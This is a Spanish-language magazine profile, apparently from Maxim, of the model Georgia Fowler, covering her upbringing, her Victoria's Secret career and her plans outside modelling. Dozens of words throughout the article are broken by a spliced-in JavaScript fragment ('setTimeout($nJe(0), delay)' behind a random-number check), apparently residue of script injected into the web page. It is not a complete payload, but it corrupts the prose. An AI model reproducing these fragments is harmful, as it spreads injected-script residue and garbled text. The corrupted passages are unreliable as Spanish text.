Georgia Fowler, una maravilla de Victoria's Secret

    Georgia Fowler, una maravilla de Victoria’s Secret

    Georgia, una modelo espectacular.

    Autor: Zeynep Yenisey de Maxim US 3 marzo, 2020


    FOTO: Instagram @georgiafowler

    Por Maxim Australia

    Cómo la súper modelo Georgia Fowler pasó de ser una tomboy de Nueva Zelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda a una maravilla de Victoria’s Secret.

    Jock, geek, hogareña, esta es la forma en la que Georgia Fowler se describe más tarde, parece estar totalmente en desacuerdo con la belleza etérea que sale de un ascensor y entra en un extenso estudio fotográfico en el Meatpacking District de Manhattan. Su cabello recogido en un moño, peinado como por la lluvia; se ve angelical, si no totalmente inocente, con el tipo de labios hechos por un piquete de abeja que los cirujanos cosméticos han hecho fortunas tratandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de copiar. Fowler tiene que subirse a un vuelo inmediatamente después de su sesión con el fotógrafo Gilles Bensimon. Sin embargo, a pesar del día agitado que se avecina, hay una sorprendente tranquilidad en ella, una cualidad serena tal vez inculcada de una infancia idílica en las playas de Nueva Zelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda.

    Su padre es el profesional de golf australiano Peter Fowler, por lo que lo atlético corre en la familia. «Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando mi padre no estaba de gira, me tenía en las redes de cricket o en el campo de prácticas con él», recuerda. “Era bastante marimacha. Me encantaba jugar con los niños y poner mi mano en alto para todos los deportes disponibles».

    View this post on Instagram

    Laid back

    A post shared by GEORGIA FOWLER (@georgiafowler) on

    Firmada con un contrato de modelaje a los 12 años después de acompañar a su hermana mayor a una agencia local en Aucklandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, Fowler fue descubierta por la potencia de la industria IMG a los 15 años, y se mudó a los Estados Unidos a los 18 años para seguir su carrera. «Tener la agencia de modelos más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande del mundo pidiéndole que se mude a Nueva York fue una gran oportunidad como para rechazarla», dice.

    Ahora de 27 años y una neoyorquina de buena fe, mucho ha cambiado desde su libre juventud. La apretada agenda de Fowler se caracteriza típicamente por sesiones de modelaje de gran importancia, spreads brillantes en revistas y glamorosas apariencias en la alfombra roja. Ha participado en desfiles para Chanel, Armani, Balmain, Miu Miu, Yeezy y Off-White, entre otros, y ha aparecido en campañas que incluyen H&M, Diesel, Banana Republic, Agent Provocateur, Gap y, quizás más notablemente, Victoria’s Secret. E incluso si no sigues la moda, es posible que la hayas visto en el video musical de Kygo y Selena Gomez «It Ain’t Me».

    «Siempre supe de los Victoria’s Secret Angels y me encantaban las revistas de moda, pero nunca pensé que algo así le pasaría a una pequeña niña Kiwi que prefería estar descalza que vestida», dice Fowler sobre su gran descanso con la megamarca de lencería.

    Por supuesto, su vida personal también ha sido de alto perfil, y ha sido fotografiada con Leonardo DiCaprio y vinculada románticamente con personajes como Harry Styles y Nick Jonas. Pero más recientemente, la chica de la portada de Kiwi se ha visto envuelta en un tipo de compromiso completamente diferente.

    «La cantidad de tiempo que paso volandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, parece que estoy en una relación con Delta Air Lines», dice ella. «Me cancelaron la semana pasada, así que estamos un poco en las rocas en este momento. Estoy buscandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a alguien que esté un poco menos por todas partes «. Señores, tomen nota.

    View this post on Instagram

    👐🏽

    A post shared by GEORGIA FOWLER (@georgiafowler) on

    Independientemente de su estilo de vida jet-set, Fowler se trata de mantenerlo simple. «Soy bastante transparente, y lo que ves es lo que obtienes», dice ella. «Por la noche, si estoy en Nueva York, terminaré en mi apartamento cocinandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, o más probablemente haciendo un pedido, para un grupo de mis amigos, con una botella de vino y un juego de mesa o una película». Lo cual es bueno ya que convertirse en un gran éxito en el mundo del modelaje no fue una tarea fácil. «Tuve cinco años de rechazo por el espectáculo antes de que finalmente lo lograra», dice sobre aterrizar un codiciado puesto en el desfile de modas de Victoria’s Secret.

    View this post on Instagram

    Shade 👒

    A post shared by GEORGIA FOWLER (@georgiafowler) on

    Incluso ante los contratiempos, Fowler no acepta un no por respuesta cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se trata de lograr sus objetivos. Ahora, ella se ha convertido en una modelo habitual en la pista VS, pavoneándose por tercera vez en 2018.

    «Era mi sueño desde antes de que pueda recordarlo, y no fue fácil», dice. «Por eso fue tan gratificante para mí cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando finalmente sucedió, y continuaré apreciandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando y trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tan duro como pueda para merecer realmente todo lo que se me presente».

    Tal éxito puede tener un precio. Para un Fowler orientado a la familia, estar lejos de sus seres queridos es el aspecto más difícil de su carrera como modelo. «Sin embargo, tengo mucha suerte», dice ella. «Tengo la oportunidad de cruzarme con mamá y papá si nuestros horarios se alinean, o vienen a visitarme a donde quiera que esté en el mundo». También trabajo mucho en Australia y aprovecho cualquier oportunidad para volver a Sydney, ya que es donde viven mi hermana y mis sobrinas, por lo que incluso si es solo por un día, siempre vale la pena «.

    Sin embargo, en un universo diferente, el modelaje no habría sido la primera opción de carrera de Georgia. En cambio, sería una cantante famosa, un sueño que ha tenido desde que era una niña. “Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando era muy joven, quería ser una estrella. En ese momento creía que era una cantante fabulosa, para diversión de mi familia «, recuerda. «Entonces, si pudiera hacer algo o tener ese talento, sería cantante».

    De manera más realista, Fowler dice que se imaginó a sí misma convertirse en ingeniera si su carrera de modelo no hubiera despegado. «Realmente me encantan las matemáticas, las ciencias y el diseño, así que estaba estudiandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando ingeniería», dice, y agrega que «era un poco geek» cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando era niña. Si bien su horario de modelo mantuvo a Fowler muy ocupada cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando era adolescente, no le impidió sobresalir en la escuela.

    «Obtuve calificaciones lo suficientemente altas como para ingresar a la universidad del segundo al último año de la escuela secundaria, así que a los 16 me inscribí», dice. “Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando estudié, comencé una licenciatura en psicología porque me parece muy interesante la gente y el cerebro. Me dedicaría a eso».

    View this post on Instagram

    〰️➰〰️

    A post shared by GEORGIA FOWLER (@georgiafowler) on

    Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se trata de lograr sus objetivos, Fowler ya lo logró en 2019. “Realizar una portada de revista es algo grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande para una modelo, y una revista como MAXIM realmente consolida su lugar, no solo en la industria como modelo, sino también como más de un nombre familiar», dice ella. “MAXIM pone solo a las mejores y más exitosas mujeres en sus portadas. ¡Realmente no puedo creer que lo haya logrado! «

    Mira a esta hermosa modelo texana, ALIE DAVIS, LE ENCANTAN LAS MALTEADAS

    Temas relacionados con esta nota: , , , ,

Georgia, una modelo espectacular.